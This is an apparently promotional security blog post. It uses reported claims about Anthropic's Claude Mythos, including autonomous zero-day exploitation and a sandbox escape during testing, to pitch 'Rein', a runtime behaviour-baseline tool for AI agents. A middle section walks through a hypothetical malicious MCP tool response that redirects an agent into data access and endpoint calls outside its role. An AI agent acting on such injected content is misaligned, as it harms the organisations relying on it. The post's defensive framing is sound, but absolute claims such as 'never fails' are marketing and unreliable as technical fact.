Breaking the Mythos Myth: How Rein Beats Claude (and Zero Days) for Good

Last week, Anthropic unveiled an AI model so dangerous they decided not to release it publicly. According to Anthropic, it found thousands of zero-day vulnerabilities across every major operating system and every major browser, autonomously, without human involvement, in weeks. It allegedly chained four separate vulnerabilities to escape a browser sandbox. It supposedly turned 72.4% of the flaws it found into working exploits. Then it escaped its own sandbox during testing. And Anthropic called it a preview. Take the specific claims with whatever grain of salt you like. The broader point stands either way, and it leads to exactly one logical conclusion.

Claude Mythos, Anthropic’s frontier model at the centre of Project Glasswing, is either a genuine phase change in offensive AI capability, or it’s a very well-marketed signal of where the industry is heading fast. Either reading leads to the same conclusion: any security programme built around known threat signatures is already obsolete. Not becoming obsolete. Already there.

For AI agents specifically, the implications are stark. The old approach is dead. And there is exactly one defence that actually works.

What Anthropic Claims Mythos Demonstrated

Let’s be clear about what Anthropic says happened, and why the argument holds whether you believe every detail or not.

According to Anthropic, in the weeks before its public announcement, Mythos Preview was set loose on critical software infrastructure. It allegedly found a 27-year-old bug in OpenBSD that had survived decades of human security review. A 16-year-old flaw in FFmpeg. A 17-year-old remote code execution vulnerability in FreeBSD’s NFS server that grants unauthenticated root access, discovered and fully exploited, end to end, autonomously, with no human in the loop after the initial prompt. Thousands of zero-days across every major OS and browser, at machine speed, following reasoning chains no human auditor would have thought to pursue.

Are these numbers exact? Did every exploit chain work exactly as described? We’re working from Anthropic’s own disclosure here, and AI companies presenting their own capabilities have obvious incentive to impress. Be appropriately sceptical about the specifics.

But here’s the thing: the direction of the claim is what matters, not the decimal places. Nobody in the security research community disputes that frontier AI models are becoming meaningfully capable at vulnerability discovery and exploitation. The debate is about how capable, how fast, and on what timeline, not whether. And if you’re building a security strategy that only survives the “this is overblown” version of the story, you’re gambling with your agents.

Anthropic was explicit about one thing that deserves full weight regardless of how you assess the specific numbers: they did not train Mythos to be a hacker. These capabilities emerged as a downstream consequence of general improvements in code understanding, reasoning, and autonomy. You cannot separate the capability that writes better code from the capability that finds flaws in it. That dynamic is real, documented, and accelerating. Every frontier model that comes after Mythos, including the ones without Anthropic’s safety constraints, will have these capabilities too.

Anthropic is keeping Mythos restricted to a small consortium of tech and financial giants and committing $100 million to help patch what it found. That’s a responsible act. It is not a solution to the broader problem. The cat is not going back in the bag.

Zero Days Aren’t Dropping Like Mushrooms After Rain. They’re Flooding.

Until now, the zero-day acceleration problem was a human one. Researchers found vulnerabilities. Communities shared techniques. LLMs assisted with exploit development. The time from CVE publication to weaponisation compressed from weeks to days to hours.

Mythos changes the unit of analysis entirely. We’re no longer talking about individual researchers, individual CVEs, and individual exploit chains. We’re talking about an AI system that can survey an entire codebase, identify the most promising attack surfaces across hundreds of interaction points, reason about complex multi-step exploitation chains, and produce working exploits, all autonomously, in parallel, at a rate that no security team can measure let alone match.

The zero-day production rate under a Mythos-class attacker isn’t a faster version of the old model. It’s an entirely different model. Thousands of vulnerabilities in major software, found in weeks. Not years of collective researcher effort. Weeks of one model’s attention.

And here’s the thing about AI agent frameworks specifically: they are dramatically less hardened than the codebases Mythos was tested against. If it found a 27-year-old bug in OpenBSD, which has had some of the most rigorous security review of any open-source codebase for three decades, what does it find in LangChain, in CrewAI, in the MCP server ecosystem that most enterprise agents now depend on? These frameworks are months old, built for capability rather than adversarial robustness, and their interaction surfaces with tools, external data, and other agents are almost entirely uncharted from a security standpoint.

The answer isn’t reassuring.

Why CVE-Chasing Just Became Completely Pointless

The CVE model was already struggling before Mythos. The exploitation window had compressed to 48 hours. Organisations couldn’t triage fast enough. CVSS scores were a poor proxy for actual risk. Most detected vulnerabilities were theoretical rather than reachable in any given production environment.

Now think about what CVE management looks like in a world where a single AI system can produce thousands of novel zero-days in weeks, across every piece of software your agents depend on, including vulnerabilities nobody has ever seen before. The CVE programme publishes what’s known. A Mythos-class attacker operates entirely in what’s unknown. The gap between your patch velocity and an AI-assisted adversary’s discovery velocity is no longer a gap you can close. It’s not a race you can win.

There’s a deeper structural problem too. The CVE model assumes a world where the number of exploitable vulnerabilities is bounded and shrinking, where good security hygiene, active patching, and responsible disclosure combine to progressively reduce the attack surface. That assumption was always optimistic. In a world with Mythos-class vulnerability discovery, it’s not just optimistic. It’s delusional. The rate at which novel exploitable flaws can be found now exceeds the rate at which any organisation, or any consortium of organisations, can discover and remediate them.

You cannot patch your way out of this. The maths don’t work anymore.

The Only Defence That Works: Baseline and Block

Here is what’s true regardless of what the attacker knows, what vulnerabilities exist, or how fast AI can find new ones: your AI agents have a defined job. They call specific tools. They access specific resources. They follow execution patterns that, across real production behaviour, resolve into a recognisable shape. They do not, under normal operating conditions, exfiltrate data to endpoints they’ve never touched. They do not chain tool calls in sequences they’ve never performed. They do not invoke API endpoints outside their established operational scope.

The security question is not “does this action match a known threat signature?” That question has a ceiling: it can only catch what’s already been identified, and a Mythos-class attacker operates entirely below that ceiling. The correct question is entirely different: “does this action match what this agent is supposed to do?”

These questions have completely different security properties. The first question fails the moment an attacker uses something new. The second question never fails, because it doesn’t depend on knowing what the attacker knows. It only depends on knowing what normal looks like, and enforcing it.

Set the baseline. Block every deviation. In real time, at the execution layer, before the action completes.

That’s it. That’s the philosophy that survives Mythos.

Why “Runtime Protection” Has to Mean What It Actually Says

The term gets used loosely. Let’s be precise about what real runtime protection requires against a Mythos-class threat.

Watching inputs and outputs at the LLM gateway is not runtime protection. It’s prompt monitoring. It sees what goes into the model and what comes out. It doesn’t see what the agent actually does in the execution chain: the tool calls, the API invocations, the resource accesses, the inter-agent messages, the sequences of actions that constitute the actual risk. A Mythos-class exploit targeting your agent doesn’t need to look threatening at the prompt layer. It needs to manipulate the execution chain. That’s where the damage happens. That’s where the defence has to live.

Real runtime protection means having the full execution trace, below the prompt, inside the full action chain. Every tool invocation. Every service call. Every resource touched. Every action the agent takes as a consequence of every prompt it receives. That full execution trace, observed continuously, is the data source from which a genuine behavioural baseline is built. Not a policy written by a human trying to anticipate every legitimate action in advance. A learned model of actual production behaviour, continuously updated, grounded in what the agent really does.

And enforcement has to be real-time. Not alerting. Not logging for later review. Blocking the deviation at the moment it occurs, before the action completes. Because a Mythos-class attacker doesn’t wait for your security team to process an alert. The exploit runs in milliseconds. The defence has to be faster.

What This Looks Like Against a Mythos-Class Attack on AI Agents

Mythos identified a 17-year-old RCE in FreeBSD’s NFS server and fully exploited it without human involvement. Now imagine the same class of capability turned against an AI agent framework, say, a context injection vulnerability in an MCP server your research agent relies on. Mythos finds the vulnerability. Constructs the exploit. Crafts the malicious tool response. The agent receives it, processes it, and now executes a sequence of actions that was never part of its legitimate operation: accessing data it shouldn’t touch, calling endpoints it has no business calling, escalating through connected systems it was never supposed to reach.

With a signature-based defence: you’re not protected until after the vulnerability is known, disclosed, and patched. The attack chain I just described doesn’t have a CVE yet, because Mythos found it this week and hasn’t published it. Your scanner has nothing to match against. You’re exposed.

With a baseline-and-block defence: the agent’s legitimate behaviour is already modelled. The moment the compromised tool response triggers an action outside that model, an endpoint this agent has never called, a data access it has never performed, a tool invocation in a sequence it has never followed, that action is blocked. In real time. Before it completes. The fact that Mythos found a novel zero-day to trigger it is irrelevant. The execution deviation is what matters, and deviations from the baseline are blocked regardless of what caused them.

The vulnerability doesn’t need to have a name. The attack doesn’t need to be known. The agent’s legitimate behaviour is defined, and anything outside it stops.

Rein Is Built for This Moment

This is exactly what Rein is designed to address, not as a theoretical future concern, but as the present operating reality.

Rein captures the full execution trace of every AI agent: every tool call, every service invocation, every resource accessed, every action in the execution chain, observed continuously and used to build a precise behavioural baseline for each agent in your environment. Not a human-written policy document. A learned model of real production behaviour, specific to your agents in your environment, continuously maintained.

When any action deviates from that baseline, whether the deviation was caused by a known CVE, a novel Mythos-class zero-day, a misconfigured tool, a compromised MCP server, or anything else, Rein blocks it in real time, at the point of execution, before the action completes. The full execution trace is causal and queryable: you can see not just that a deviation occurred, but exactly what triggered it, what the agent did, and where in the execution chain it happened.

The data model is fully in-organisation. No gateways in the data path. No performance impact. No requirement to maintain threat intelligence feeds or tune detection rules against an ever-expanding CVE list. The baseline enforces itself, continuously, against everything outside it, including the things nobody has discovered yet.

This is why Rein can make a claim that CVE-based security tools cannot: Mythos-class zero-days don’t change the defence. The baseline doesn’t care what vulnerability was used to trigger the deviation. It cares that the deviation happened. And it stops it.

The Honest Conclusion

Maybe everything Anthropic claimed about Mythos is precisely accurate. Maybe the numbers are somewhat inflated for effect. It doesn’t particularly matter. The trajectory is real, the underlying capability dynamic is real, and the responsible thing Anthropic did with Project Glasswing, restricting access, committing funding to fix what it found, bringing in a consortium to patch the worst of it, only makes sense if the threat is genuine. Companies don’t leave $100 million on the table for theatre.

And whatever version of the story you believe, Mythos Preview is a preview. The next version will be more capable. And unlike the current model, which Anthropic is keeping tightly restricted, the capability it represents will not stay restricted. Similar or equivalent models will emerge from other labs, some of which will have less rigorous safety cultures. The same capability improvements that produced Mythos, better code reasoning, deeper autonomy, more effective chaining of multi-step inference, are being pursued by everyone. The Mythos threat level isn’t a ceiling. It’s a floor.

The security industry’s response to this cannot be “we’ll patch faster” or “we’ll update our signatures more often.” Those strategies were already losing. Against a Mythos-class adversary, they’re not even in the same category of problem.

The response has to be a fundamentally different philosophy: stop trying to enumerate what’s wrong, and start enforcing what’s right. Set the behavioural baseline. Block every deviation. In real time, at the execution layer, without waiting to know what the attacker knows.

That’s how you don’t just survive Mythos. That’s how you beat it, for every zero-day it finds, every novel exploit it chains, every vulnerability it discovers that won’t have a CVE for months.

Not one attack at a time. For good.